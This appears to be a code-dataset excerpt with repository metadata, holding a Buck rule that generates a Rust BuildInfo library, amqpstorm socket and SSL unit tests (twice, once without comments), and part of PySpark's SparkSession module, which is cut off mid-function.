        :return: (RootRuleTarget for the library, [genrule, rust_library])
        """
        rules = []

        info = (
            self.get_build_info(
                base_path,
                name,
                rule_type,
                platform))

        # Header of the generated source: the BuildInfo struct definition.
        template = """
#[derive(Debug, Copy, Clone, Eq, PartialEq, Ord, PartialOrd, Hash)]
pub struct BuildInfo {
"""

        # Construct a template
        for k, v in info.items():
            # Integer values map to u64 fields; everything else is emitted
            # as a static string.  NOTE: `type` shadows the builtin here.
            if isinstance(v, int):
                type = "u64"
            else:
                type = "&'static str"
            template += " pub %s: %s,\n" % (k, type)
        template += "}\n"

        template += """
pub const BUILDINFO: BuildInfo = BuildInfo {
"""
        for k, v in info.items():
            if isinstance(v, int):
                template += " %s: %s,\n" % (k, v)
            else:
                template += " %s: \"%s\",\n" % (k, v)
        template += "};\n"

        # Genrule emitting the generated source as lib.rs.
        source_name = name + "-rust-build-info"
        source_attrs = collections.OrderedDict()
        source_attrs['name'] = source_name
        if visibility is not None:
            source_attrs['visibility'] = visibility
        source_attrs['out'] = 'lib.rs'
        source_attrs['cmd'] = (
            'mkdir -p `dirname $OUT` && echo {0} > $OUT'
            .format(pipes.quote(template)))
        rules.append(Rule('genrule', source_attrs))

        # Statically-linked rust_library wrapping the generated source.
        lib_name = name + '-rust-build-info-lib'
        lib_attrs = collections.OrderedDict()
        lib_attrs['name'] = lib_name
        if visibility is not None:
            lib_attrs['visibility'] = visibility
        lib_attrs['crate'] = (crate or name) + "_build_info"
        lib_attrs['preferred_linkage'] = 'static'
        lib_attrs['srcs'] = [':' + source_name]
        lib_attrs['default_platform'] = platform_utils.get_buck_platform_for_base_path(base_path)
        rules.append(Rule('rust_library', lib_attrs))

        return RootRuleTarget(base_path, lib_name), rules
| true | true |
1c3c76f7f6a1c8412b949d00c997a21efe94fb01 | 6,174 | py | Python | amqpstorm/tests/unit/io/test_io.py | ZygusPatryk/amqpstorm | 0f3ad84a529f12769d34638a88c38f3055cb05cd | [
"MIT"
] | 140 | 2016-06-07T18:53:57.000Z | 2022-03-23T01:50:15.000Z | amqpstorm/tests/unit/io/test_io.py | ZygusPatryk/amqpstorm | 0f3ad84a529f12769d34638a88c38f3055cb05cd | [
"MIT"
] | 85 | 2016-04-11T23:32:32.000Z | 2022-03-19T07:21:21.000Z | amqpstorm/tests/unit/io/test_io.py | ZygusPatryk/amqpstorm | 0f3ad84a529f12769d34638a88c38f3055cb05cd | [
"MIT"
] | 38 | 2016-04-20T20:21:13.000Z | 2022-03-23T05:31:58.000Z | import socket
import ssl
import mock
import amqpstorm.io
from amqpstorm.exception import AMQPConnectionError
from amqpstorm.io import IO
from amqpstorm.tests.utility import FakeConnection
from amqpstorm.tests.utility import TestFramework
class IOTests(TestFramework):
    """Unit tests for amqpstorm's IO layer: socket lifecycle, SSL wrapping,
    address resolution and raw send/receive plumbing."""

    def test_io_socket_close(self):
        # close() should dispose of the underlying socket and clear the attr.
        connection = FakeConnection()
        io = IO(connection.parameters)
        io.socket = mock.Mock(name='socket', spec=socket.socket)
        io.close()
        self.assertIsNone(io.socket)

    def test_io_use_ssl_false(self):
        connection = FakeConnection()
        io = IO(connection.parameters)
        self.assertFalse(io.use_ssl)

    def test_io_use_ssl_true(self):
        connection = FakeConnection()
        connection.parameters['ssl'] = True
        io = IO(connection.parameters)
        self.assertTrue(io.use_ssl)

    def test_io_create_socket(self):
        connection = FakeConnection()
        io = IO(connection.parameters)
        self.assertFalse(io.use_ssl)
        addresses = io._get_socket_addresses()
        sock_address_tuple = addresses[0]
        sock = io._create_socket(socket_family=sock_address_tuple[0])
        if hasattr(socket, 'socket'):
            self.assertIsInstance(sock, socket.socket)

    def test_io_create_ssl_socket(self):
        # With ssl enabled the created socket must come back SSL-wrapped.
        connection = FakeConnection()
        connection.parameters['ssl'] = True
        io = IO(connection.parameters)
        self.assertTrue(io.use_ssl)
        addresses = io._get_socket_addresses()
        sock_address_tuple = addresses[0]
        sock = io._create_socket(socket_family=sock_address_tuple[0])
        if hasattr(socket, 'socket'):
            self.assertIsInstance(sock, socket.socket)
        if hasattr(ssl, 'SSLSocket'):
            self.assertIsInstance(sock, ssl.SSLSocket)

    def test_io_get_socket_address(self):
        connection = FakeConnection()
        connection.parameters['hostname'] = '127.0.0.1'
        connection.parameters['port'] = 5672
        io = IO(connection.parameters)
        addresses = io._get_socket_addresses()
        sock_address_tuple = addresses[0]
        # Index 4 of a getaddrinfo entry is the (host, port) sockaddr.
        self.assertEqual(sock_address_tuple[4],
                         ('127.0.0.1', 5672))

    def test_io_simple_receive(self):
        # Plain sockets are read via recv().
        connection = FakeConnection()
        io = IO(connection.parameters)
        self.assertFalse(io.use_ssl)
        io.socket = mock.Mock(name='socket', spec=socket.socket)
        io.socket.recv.return_value = '12345'
        self.assertEqual(io._receive(), '12345')

    def test_io_simple_ssl_receive(self):
        # SSL sockets are read via read(); the mock spec depends on which
        # SSL object type this Python build provides.
        connection = FakeConnection()
        connection.parameters['ssl'] = True
        io = IO(connection.parameters)
        self.assertTrue(io.use_ssl)
        if hasattr(ssl, 'SSLObject'):
            io.socket = mock.Mock(name='socket', spec=ssl.SSLObject)
        elif hasattr(ssl, 'SSLSocket'):
            io.socket = mock.Mock(name='socket', spec=ssl.SSLSocket)
        io.socket.read.return_value = '12345'
        self.assertEqual(io._receive(), '12345')

    def test_io_simple_send_zero_bytes_sent(self):
        # send() returning 0 means the peer is gone; the error must surface
        # through the connection's exception queue as AMQPConnectionError.
        connection = FakeConnection()
        io = IO(connection.parameters, exceptions=connection.exceptions)
        io.socket = mock.Mock(name='socket', spec=socket.socket)
        io.socket.send.return_value = 0
        io.write_to_socket(self.message)
        self.assertRaisesRegex(
            AMQPConnectionError,
            'connection/socket error',
            connection.check_for_errors
        )

    def test_io_set_ssl_context(self):
        connection = FakeConnection()
        connection.parameters['ssl_options'] = {
            'context': ssl.create_default_context(),
            'server_hostname': 'localhost',
        }
        io = IO(connection.parameters)
        self.assertTrue(io._ssl_wrap_socket(socket.socket()))

    def test_io_set_ssl_verify_req(self):
        # The string option 'required' should map to ssl.CERT_REQUIRED.
        connection = FakeConnection()
        connection.parameters['ssl_options'] = {
            'verify_mode': 'required'
        }
        io = IO(connection.parameters)
        sock = io._ssl_wrap_socket(socket.socket())
        self.assertEqual(sock.context.verify_mode, ssl.CERT_REQUIRED)

    def test_io_set_ssl_context_no_hostname_provided(self):
        # A caller-supplied context requires server_hostname (for SNI).
        connection = FakeConnection()
        connection.parameters['ssl_options'] = {
            'context': ssl.create_default_context(),
        }
        io = IO(connection.parameters)
        self.assertRaises(ValueError, io._ssl_wrap_socket, socket.socket())

    def test_io_has_ipv6(self):
        # Patch getaddrinfo so the arguments IO passes can be inspected.
        restore_func = socket.getaddrinfo

        def mock_getaddrinfo(hostname, port, family, socktype):
            return [hostname, port, family, socktype]

        try:
            amqpstorm.io.socket.getaddrinfo = mock_getaddrinfo
            connection = FakeConnection()
            connection.parameters['hostname'] = 'localhost'
            connection.parameters['port'] = 1234
            parameters = connection.parameters
            io = IO(parameters)
            result = io._get_socket_addresses()
            self.assertEqual(result[2], socket.AF_UNSPEC)
            self.assertEqual(result[3], socket.SOCK_STREAM)
        finally:
            amqpstorm.io.socket.getaddrinfo = restore_func

    def test_io_has_ipv6_is_false(self):
        # With IPv6 unavailable, resolution must fall back to AF_INET.
        restore_func = socket.getaddrinfo
        restore_has_ipv6 = amqpstorm.io.socket.has_ipv6

        def mock_getaddrinfo(hostname, port, family, socktype):
            return [hostname, port, family, socktype]

        try:
            amqpstorm.io.socket.getaddrinfo = mock_getaddrinfo
            amqpstorm.io.socket.has_ipv6 = False
            connection = FakeConnection()
            connection.parameters['hostname'] = 'localhost'
            connection.parameters['port'] = 1234
            parameters = connection.parameters
            io = IO(parameters)
            result = io._get_socket_addresses()
            self.assertEqual(result[2], socket.AF_INET)
            self.assertEqual(result[3], socket.SOCK_STREAM)
        finally:
            amqpstorm.io.socket.getaddrinfo = restore_func
            amqpstorm.io.socket.has_ipv6 = restore_has_ipv6
| 32.840426 | 75 | 0.645449 | import socket
import ssl
import mock
import amqpstorm.io
from amqpstorm.exception import AMQPConnectionError
from amqpstorm.io import IO
from amqpstorm.tests.utility import FakeConnection
from amqpstorm.tests.utility import TestFramework
class IOTests(TestFramework):
    """Unit tests for amqpstorm's IO layer (comment-stripped dataset copy
    of the same suite): socket lifecycle, SSL wrapping, address resolution
    and raw send/receive plumbing."""

    def test_io_socket_close(self):
        connection = FakeConnection()
        io = IO(connection.parameters)
        io.socket = mock.Mock(name='socket', spec=socket.socket)
        io.close()
        self.assertIsNone(io.socket)

    def test_io_use_ssl_false(self):
        connection = FakeConnection()
        io = IO(connection.parameters)
        self.assertFalse(io.use_ssl)

    def test_io_use_ssl_true(self):
        connection = FakeConnection()
        connection.parameters['ssl'] = True
        io = IO(connection.parameters)
        self.assertTrue(io.use_ssl)

    def test_io_create_socket(self):
        connection = FakeConnection()
        io = IO(connection.parameters)
        self.assertFalse(io.use_ssl)
        addresses = io._get_socket_addresses()
        sock_address_tuple = addresses[0]
        sock = io._create_socket(socket_family=sock_address_tuple[0])
        if hasattr(socket, 'socket'):
            self.assertIsInstance(sock, socket.socket)

    def test_io_create_ssl_socket(self):
        connection = FakeConnection()
        connection.parameters['ssl'] = True
        io = IO(connection.parameters)
        self.assertTrue(io.use_ssl)
        addresses = io._get_socket_addresses()
        sock_address_tuple = addresses[0]
        sock = io._create_socket(socket_family=sock_address_tuple[0])
        if hasattr(socket, 'socket'):
            self.assertIsInstance(sock, socket.socket)
        if hasattr(ssl, 'SSLSocket'):
            self.assertIsInstance(sock, ssl.SSLSocket)

    def test_io_get_socket_address(self):
        connection = FakeConnection()
        connection.parameters['hostname'] = '127.0.0.1'
        connection.parameters['port'] = 5672
        io = IO(connection.parameters)
        addresses = io._get_socket_addresses()
        sock_address_tuple = addresses[0]
        self.assertEqual(sock_address_tuple[4],
                         ('127.0.0.1', 5672))

    def test_io_simple_receive(self):
        connection = FakeConnection()
        io = IO(connection.parameters)
        self.assertFalse(io.use_ssl)
        io.socket = mock.Mock(name='socket', spec=socket.socket)
        io.socket.recv.return_value = '12345'
        self.assertEqual(io._receive(), '12345')

    def test_io_simple_ssl_receive(self):
        connection = FakeConnection()
        connection.parameters['ssl'] = True
        io = IO(connection.parameters)
        self.assertTrue(io.use_ssl)
        if hasattr(ssl, 'SSLObject'):
            io.socket = mock.Mock(name='socket', spec=ssl.SSLObject)
        elif hasattr(ssl, 'SSLSocket'):
            io.socket = mock.Mock(name='socket', spec=ssl.SSLSocket)
        io.socket.read.return_value = '12345'
        self.assertEqual(io._receive(), '12345')

    def test_io_simple_send_zero_bytes_sent(self):
        connection = FakeConnection()
        io = IO(connection.parameters, exceptions=connection.exceptions)
        io.socket = mock.Mock(name='socket', spec=socket.socket)
        io.socket.send.return_value = 0
        io.write_to_socket(self.message)
        self.assertRaisesRegex(
            AMQPConnectionError,
            'connection/socket error',
            connection.check_for_errors
        )

    def test_io_set_ssl_context(self):
        connection = FakeConnection()
        connection.parameters['ssl_options'] = {
            'context': ssl.create_default_context(),
            'server_hostname': 'localhost',
        }
        io = IO(connection.parameters)
        self.assertTrue(io._ssl_wrap_socket(socket.socket()))

    def test_io_set_ssl_verify_req(self):
        connection = FakeConnection()
        connection.parameters['ssl_options'] = {
            'verify_mode': 'required'
        }
        io = IO(connection.parameters)
        sock = io._ssl_wrap_socket(socket.socket())
        self.assertEqual(sock.context.verify_mode, ssl.CERT_REQUIRED)

    def test_io_set_ssl_context_no_hostname_provided(self):
        connection = FakeConnection()
        connection.parameters['ssl_options'] = {
            'context': ssl.create_default_context(),
        }
        io = IO(connection.parameters)
        self.assertRaises(ValueError, io._ssl_wrap_socket, socket.socket())

    def test_io_has_ipv6(self):
        restore_func = socket.getaddrinfo

        def mock_getaddrinfo(hostname, port, family, socktype):
            return [hostname, port, family, socktype]

        try:
            amqpstorm.io.socket.getaddrinfo = mock_getaddrinfo
            connection = FakeConnection()
            connection.parameters['hostname'] = 'localhost'
            connection.parameters['port'] = 1234
            parameters = connection.parameters
            io = IO(parameters)
            result = io._get_socket_addresses()
            self.assertEqual(result[2], socket.AF_UNSPEC)
            self.assertEqual(result[3], socket.SOCK_STREAM)
        finally:
            amqpstorm.io.socket.getaddrinfo = restore_func

    def test_io_has_ipv6_is_false(self):
        restore_func = socket.getaddrinfo
        restore_has_ipv6 = amqpstorm.io.socket.has_ipv6

        def mock_getaddrinfo(hostname, port, family, socktype):
            return [hostname, port, family, socktype]

        try:
            amqpstorm.io.socket.getaddrinfo = mock_getaddrinfo
            amqpstorm.io.socket.has_ipv6 = False
            connection = FakeConnection()
            connection.parameters['hostname'] = 'localhost'
            connection.parameters['port'] = 1234
            parameters = connection.parameters
            io = IO(parameters)
            result = io._get_socket_addresses()
            self.assertEqual(result[2], socket.AF_INET)
            self.assertEqual(result[3], socket.SOCK_STREAM)
        finally:
            amqpstorm.io.socket.getaddrinfo = restore_func
            amqpstorm.io.socket.has_ipv6 = restore_has_ipv6
| true | true |
1c3c7778c7ee126389e43d7099e098533df4a200 | 37,802 | py | Python | python/pyspark/sql/session.py | zhouzach/spark | ad77b400da4089a2de74394e2b8aed813633025a | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 4 | 2019-12-02T00:44:54.000Z | 2022-01-26T20:44:14.000Z | python/pyspark/sql/session.py | zhouzach/spark | ad77b400da4089a2de74394e2b8aed813633025a | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 23 | 2019-11-25T10:56:33.000Z | 2022-02-16T01:07:16.000Z | python/pyspark/sql/session.py | zhouzach/spark | ad77b400da4089a2de74394e2b8aed813633025a | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3 | 2022-03-09T05:11:47.000Z | 2022-03-09T20:29:10.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import sys
import warnings
from functools import reduce
from threading import RLock
if sys.version >= '3':
basestring = unicode = str
xrange = range
else:
from itertools import izip as zip, imap as map
from pyspark import since
from pyspark.rdd import RDD, ignore_unicode_prefix
from pyspark.sql.conf import RuntimeConfig
from pyspark.sql.dataframe import DataFrame
from pyspark.sql.readwriter import DataFrameReader
from pyspark.sql.streaming import DataStreamReader
from pyspark.sql.types import Row, DataType, StringType, StructType, TimestampType, \
_make_type_verifier, _infer_schema, _has_nulltype, _merge_type, _create_converter, \
_parse_datatype_string
from pyspark.sql.utils import install_exception_handler
__all__ = ["SparkSession"]
def _monkey_patch_RDD(sparkSession):
    """Attach a ``toDF`` convenience method to :class:`RDD`, bound to the
    given session so plain RDDs can be converted to DataFrames."""
    def toDF(self, schema=None, sampleRatio=None):
        """
        Converts current :class:`RDD` into a :class:`DataFrame`

        This is a shorthand for ``spark.createDataFrame(rdd, schema, sampleRatio)``

        :param schema: a :class:`pyspark.sql.types.StructType` or list of names of columns
        :param samplingRatio: the sample ratio of rows used for inferring
        :return: a DataFrame

        >>> rdd.toDF().collect()
        [Row(name=u'Alice', age=1)]
        """
        return sparkSession.createDataFrame(self, schema, sampleRatio)

    # Install the closure (which captures sparkSession) onto the RDD class.
    RDD.toDF = toDF
class SparkSession(object):
"""The entry point to programming Spark with the Dataset and DataFrame API.
A SparkSession can be used create :class:`DataFrame`, register :class:`DataFrame` as
tables, execute SQL over tables, cache tables, and read parquet files.
To create a SparkSession, use the following builder pattern:
>>> spark = SparkSession.builder \\
... .master("local") \\
... .appName("Word Count") \\
... .config("spark.some.config.option", "some-value") \\
... .getOrCreate()
.. autoattribute:: builder
:annotation:
"""
    class Builder(object):
        """Builder for :class:`SparkSession`.
        """

        # NOTE: class-level state -- Builder is normally reached through the
        # class attribute ``SparkSession.builder``, so options accumulate on
        # the class, guarded by a re-entrant lock.
        _lock = RLock()
        _options = {}
        _sc = None

        @since(2.0)
        def config(self, key=None, value=None, conf=None):
            """Sets a config option. Options set using this method are automatically propagated to
            both :class:`SparkConf` and :class:`SparkSession`'s own configuration.

            For an existing SparkConf, use `conf` parameter.

            >>> from pyspark.conf import SparkConf
            >>> SparkSession.builder.config(conf=SparkConf())
            <pyspark.sql.session...

            For a (key, value) pair, you can omit parameter names.

            >>> SparkSession.builder.config("spark.some.config.option", "some-value")
            <pyspark.sql.session...

            :param key: a key name string for configuration property
            :param value: a value for configuration property
            :param conf: an instance of :class:`SparkConf`
            """
            with self._lock:
                if conf is None:
                    # Single (key, value) pair.
                    self._options[key] = str(value)
                else:
                    # Copy every entry from an existing SparkConf.
                    for (k, v) in conf.getAll():
                        self._options[k] = v
                return self

        @since(2.0)
        def master(self, master):
            """Sets the Spark master URL to connect to, such as "local" to run locally, "local[4]"
            to run locally with 4 cores, or "spark://master:7077" to run on a Spark standalone
            cluster.

            :param master: a url for spark master
            """
            return self.config("spark.master", master)

        @since(2.0)
        def appName(self, name):
            """Sets a name for the application, which will be shown in the Spark web UI.

            If no application name is set, a randomly generated name will be used.

            :param name: an application name
            """
            return self.config("spark.app.name", name)

        @since(2.0)
        def enableHiveSupport(self):
            """Enables Hive support, including connectivity to a persistent Hive metastore, support
            for Hive SerDes, and Hive user-defined functions.
            """
            return self.config("spark.sql.catalogImplementation", "hive")

        def _sparkContext(self, sc):
            # Internal hook: pin the builder to an existing SparkContext so
            # getOrCreate() reuses it instead of creating one.
            with self._lock:
                self._sc = sc
                return self

        @since(2.0)
        def getOrCreate(self):
            """Gets an existing :class:`SparkSession` or, if there is no existing one, creates a
            new one based on the options set in this builder.

            This method first checks whether there is a valid global default SparkSession, and if
            yes, return that one. If no valid global default SparkSession exists, the method
            creates a new SparkSession and assigns the newly created SparkSession as the global
            default.

            >>> s1 = SparkSession.builder.config("k1", "v1").getOrCreate()
            >>> s1.conf.get("k1") == "v1"
            True

            In case an existing SparkSession is returned, the config options specified
            in this builder will be applied to the existing SparkSession.

            >>> s2 = SparkSession.builder.config("k2", "v2").getOrCreate()
            >>> s1.conf.get("k1") == s2.conf.get("k1")
            True
            >>> s1.conf.get("k2") == s2.conf.get("k2")
            True
            """
            with self._lock:
                from pyspark.context import SparkContext
                from pyspark.conf import SparkConf
                session = SparkSession._instantiatedSession
                # Only build a new session when none exists or the existing
                # one's SparkContext has been stopped (its _jsc is None).
                if session is None or session._sc._jsc is None:
                    if self._sc is not None:
                        sc = self._sc
                    else:
                        sparkConf = SparkConf()
                        for key, value in self._options.items():
                            sparkConf.set(key, value)
                        # This SparkContext may be an existing one.
                        sc = SparkContext.getOrCreate(sparkConf)
                    # Do not update `SparkConf` for existing `SparkContext`, as it's shared
                    # by all sessions.
                    session = SparkSession(sc)
                # Apply this builder's options to the (new or reused) session.
                for key, value in self._options.items():
                    session._jsparkSession.sessionState().conf().setConfString(key, value)
                return session
builder = Builder()
"""A class attribute having a :class:`Builder` to construct :class:`SparkSession` instances."""
_instantiatedSession = None
_activeSession = None
    @ignore_unicode_prefix
    def __init__(self, sparkContext, jsparkSession=None):
        """Creates a new SparkSession.

        :param sparkContext: the Python :class:`SparkContext` to wrap.
        :param jsparkSession: an optional existing JVM-side SparkSession;
            when omitted, the JVM default session is reused if still alive,
            otherwise a fresh one is created.

        >>> from datetime import datetime
        >>> spark = SparkSession(sc)
        >>> allTypes = sc.parallelize([Row(i=1, s="string", d=1.0, l=1,
        ...     b=True, list=[1, 2, 3], dict={"s": 0}, row=Row(a=1),
        ...     time=datetime(2014, 8, 1, 14, 1, 5))])
        >>> df = allTypes.toDF()
        >>> df.createOrReplaceTempView("allTypes")
        >>> spark.sql('select i+1, d+1, not b, list[1], dict["s"], time, row.a '
        ...     'from allTypes where b and i > 0').collect()
        [Row((i + CAST(1 AS BIGINT))=2, (d + CAST(1 AS DOUBLE))=2.0, (NOT b)=False, list[1]=2, \
dict[s]=0, time=datetime.datetime(2014, 8, 1, 14, 1, 5), a=1)]
        >>> df.rdd.map(lambda x: (x.i, x.s, x.d, x.l, x.b, x.time, x.row.a, x.list)).collect()
        [(1, u'string', 1.0, 1, True, datetime.datetime(2014, 8, 1, 14, 1, 5), 1, [1, 2, 3])]
        """
        from pyspark.sql.context import SQLContext
        self._sc = sparkContext
        self._jsc = self._sc._jsc
        self._jvm = self._sc._jvm
        if jsparkSession is None:
            # Reuse the JVM default session only if it exists and its
            # SparkContext has not been stopped.
            if self._jvm.SparkSession.getDefaultSession().isDefined() \
                    and not self._jvm.SparkSession.getDefaultSession().get() \
                        .sparkContext().isStopped():
                jsparkSession = self._jvm.SparkSession.getDefaultSession().get()
            else:
                jsparkSession = self._jvm.SparkSession(self._jsc.sc())
        self._jsparkSession = jsparkSession
        self._jwrapped = self._jsparkSession.sqlContext()
        self._wrapped = SQLContext(self._sc, self, self._jwrapped)
        # Give RDDs a session-bound toDF(), and route Py4J errors through
        # pyspark's friendlier exception handler.
        _monkey_patch_RDD(self)
        install_exception_handler()
        # If we had an instantiated SparkSession attached with a SparkContext
        # which is stopped now, we need to renew the instantiated SparkSession.
        # Otherwise, we will use invalid SparkSession when we call Builder.getOrCreate.
        if SparkSession._instantiatedSession is None \
                or SparkSession._instantiatedSession._sc._jsc is None:
            SparkSession._instantiatedSession = self
            SparkSession._activeSession = self
            self._jvm.SparkSession.setDefaultSession(self._jsparkSession)
            self._jvm.SparkSession.setActiveSession(self._jsparkSession)
    def _repr_html_(self):
        # Rich (notebook) repr: show the catalog implementation plus the
        # SparkContext's own HTML summary.
        return """
            <div>
                <p><b>SparkSession - {catalogImplementation}</b></p>
                {sc_HTML}
            </div>
        """.format(
            catalogImplementation=self.conf.get("spark.sql.catalogImplementation"),
            sc_HTML=self.sparkContext._repr_html_()
        )
@since(2.0)
def newSession(self):
"""
Returns a new SparkSession as new session, that has separate SQLConf,
registered temporary views and UDFs, but shared SparkContext and
table cache.
"""
return self.__class__(self._sc, self._jsparkSession.newSession())
@classmethod
@since(3.0)
def getActiveSession(cls):
"""
Returns the active SparkSession for the current thread, returned by the builder.
>>> s = SparkSession.getActiveSession()
>>> l = [('Alice', 1)]
>>> rdd = s.sparkContext.parallelize(l)
>>> df = s.createDataFrame(rdd, ['name', 'age'])
>>> df.select("age").collect()
[Row(age=1)]
"""
from pyspark import SparkContext
sc = SparkContext._active_spark_context
if sc is None:
return None
else:
if sc._jvm.SparkSession.getActiveSession().isDefined():
SparkSession(sc, sc._jvm.SparkSession.getActiveSession().get())
return SparkSession._activeSession
else:
return None
    @property
    @since(2.0)
    def sparkContext(self):
        """Returns the underlying :class:`SparkContext` this session wraps."""
        return self._sc
    @property
    @since(2.0)
    def version(self):
        """The version of Spark on which this application is running."""
        # Delegated to the JVM-side SparkSession.
        return self._jsparkSession.version()
@property
@since(2.0)
def conf(self):
"""Runtime configuration interface for Spark.
This is the interface through which the user can get and set all Spark and Hadoop
configurations that are relevant to Spark SQL. When getting the value of a config,
this defaults to the value set in the underlying :class:`SparkContext`, if any.
"""
if not hasattr(self, "_conf"):
self._conf = RuntimeConfig(self._jsparkSession.conf())
return self._conf
@property
@since(2.0)
def catalog(self):
"""Interface through which the user may create, drop, alter or query underlying
databases, tables, functions, etc.
:return: :class:`Catalog`
"""
from pyspark.sql.catalog import Catalog
if not hasattr(self, "_catalog"):
self._catalog = Catalog(self)
return self._catalog
@property
@since(2.0)
def udf(self):
"""Returns a :class:`UDFRegistration` for UDF registration.
:return: :class:`UDFRegistration`
"""
from pyspark.sql.udf import UDFRegistration
return UDFRegistration(self)
@since(2.0)
def range(self, start, end=None, step=1, numPartitions=None):
"""
Create a :class:`DataFrame` with single :class:`pyspark.sql.types.LongType` column named
``id``, containing elements in a range from ``start`` to ``end`` (exclusive) with
step value ``step``.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numPartitions: the number of partitions of the DataFrame
:return: :class:`DataFrame`
>>> spark.range(1, 7, 2).collect()
[Row(id=1), Row(id=3), Row(id=5)]
If only one argument is specified, it will be used as the end value.
>>> spark.range(3).collect()
[Row(id=0), Row(id=1), Row(id=2)]
"""
if numPartitions is None:
numPartitions = self._sc.defaultParallelism
if end is None:
jdf = self._jsparkSession.range(0, int(start), int(step), int(numPartitions))
else:
jdf = self._jsparkSession.range(int(start), int(end), int(step), int(numPartitions))
return DataFrame(jdf, self._wrapped)
def _inferSchemaFromList(self, data, names=None):
"""
Infer schema from list of Row or tuple.
:param data: list of Row or tuple
:param names: list of column names
:return: :class:`pyspark.sql.types.StructType`
"""
if not data:
raise ValueError("can not infer schema from empty dataset")
first = data[0]
if type(first) is dict:
warnings.warn("inferring schema from dict is deprecated,"
"please use pyspark.sql.Row instead")
schema = reduce(_merge_type, (_infer_schema(row, names) for row in data))
if _has_nulltype(schema):
raise ValueError("Some of types cannot be determined after inferring")
return schema
    def _inferSchema(self, rdd, samplingRatio=None, names=None):
        """
        Infer schema from an RDD of Row or tuple.

        :param rdd: an RDD of Row or tuple
        :param samplingRatio: sampling ratio, or no sampling (default)
        :param names: list of column names applied while inferring
        :return: :class:`pyspark.sql.types.StructType`
        """
        first = rdd.first()
        if not first:
            raise ValueError("The first row in RDD is empty, "
                             "can not infer schema")
        if type(first) is dict:
            warnings.warn("Using RDD of dict to inferSchema is deprecated. "
                          "Use pyspark.sql.Row instead")

        if samplingRatio is None:
            # No sampling: start from the first row, then scan up to 100 more
            # rows only while some field's type is still unknown (null).
            schema = _infer_schema(first, names=names)
            if _has_nulltype(schema):
                for row in rdd.take(100)[1:]:
                    schema = _merge_type(schema, _infer_schema(row, names=names))
                    if not _has_nulltype(schema):
                        break
                else:
                    # for/else: ran out of rows without resolving every type.
                    raise ValueError("Some of types cannot be determined by the "
                                     "first 100 rows, please try again with sampling")
        else:
            # Sample the RDD (skipping the sample when the ratio is ~1) and
            # merge the per-row schemas across the whole sample.
            if samplingRatio < 0.99:
                rdd = rdd.sample(False, float(samplingRatio))
            schema = rdd.map(lambda row: _infer_schema(row, names)).reduce(_merge_type)
        return schema
    def _createFromRDD(self, rdd, schema, samplingRatio):
        """
        Create an RDD for DataFrame from an existing RDD, returns the RDD and schema.

        :param rdd: source RDD of Row/tuple records
        :param schema: a :class:`StructType`, a list of column names, or None
        :param samplingRatio: forwarded to schema inference when needed
        """
        if schema is None or isinstance(schema, (list, tuple)):
            # Infer a StructType (optionally sampling) and normalize each row
            # into the tuple shape that matches it.
            struct = self._inferSchema(rdd, samplingRatio, names=schema)
            converter = _create_converter(struct)
            rdd = rdd.map(converter)
            if isinstance(schema, (list, tuple)):
                # Overlay the caller-supplied column names onto the inferred
                # fields, positionally.
                for i, name in enumerate(schema):
                    struct.fields[i].name = name
                    struct.names[i] = name
            schema = struct

        elif not isinstance(schema, StructType):
            raise TypeError("schema should be StructType or list or None, but got: %s" % schema)

        # convert python objects to sql data
        rdd = rdd.map(schema.toInternal)
        return rdd, schema
    def _createFromLocal(self, data, schema):
        """
        Create an RDD for DataFrame from a list or pandas.DataFrame, returns
        the RDD and schema.

        :param data: local collection of Row/tuple records
        :param schema: a :class:`StructType`, a list of column names, or None
        """
        # make sure data could consumed multiple times
        if not isinstance(data, list):
            data = list(data)

        if schema is None or isinstance(schema, (list, tuple)):
            # Infer a StructType from the rows and normalize each row to it.
            struct = self._inferSchemaFromList(data, names=schema)
            converter = _create_converter(struct)
            data = map(converter, data)
            if isinstance(schema, (list, tuple)):
                # Overlay caller-supplied column names onto inferred fields.
                for i, name in enumerate(schema):
                    struct.fields[i].name = name
                    struct.names[i] = name
            schema = struct

        elif not isinstance(schema, StructType):
            raise TypeError("schema should be StructType or list or None, but got: %s" % schema)

        # convert python objects to sql data
        data = [schema.toInternal(row) for row in data]
        return self._sc.parallelize(data), schema
def _get_numpy_record_dtype(self, rec):
"""
Used when converting a pandas.DataFrame to Spark using to_records(), this will correct
the dtypes of fields in a record so they can be properly loaded into Spark.
:param rec: a numpy record to check field dtypes
:return corrected dtype for a numpy.record or None if no correction needed
"""
import numpy as np
cur_dtypes = rec.dtype
col_names = cur_dtypes.names
record_type_list = []
has_rec_fix = False
for i in xrange(len(cur_dtypes)):
curr_type = cur_dtypes[i]
# If type is a datetime64 timestamp, convert to microseconds
# NOTE: if dtype is datetime[ns] then np.record.tolist() will output values as longs,
# conversion from [us] or lower will lead to py datetime objects, see SPARK-22417
if curr_type == np.dtype('datetime64[ns]'):
curr_type = 'datetime64[us]'
has_rec_fix = True
record_type_list.append((str(col_names[i]), curr_type))
return np.dtype(record_type_list) if has_rec_fix else None
    def _convert_from_pandas(self, pdf, schema, timezone):
        """
        Convert a pandas.DataFrame to list of records that can be used to make a DataFrame

        :param pdf: the pandas.DataFrame to convert
        :param schema: expected :class:`StructType`, or a non-StructType
            value to convert every column
        :param timezone: session-local timezone for localizing timestamp
            columns, or None to skip timezone handling
        :return list of records
        """
        if timezone is not None:
            from pyspark.sql.types import _check_series_convert_timestamps_tz_local
            copied = False
            if isinstance(schema, StructType):
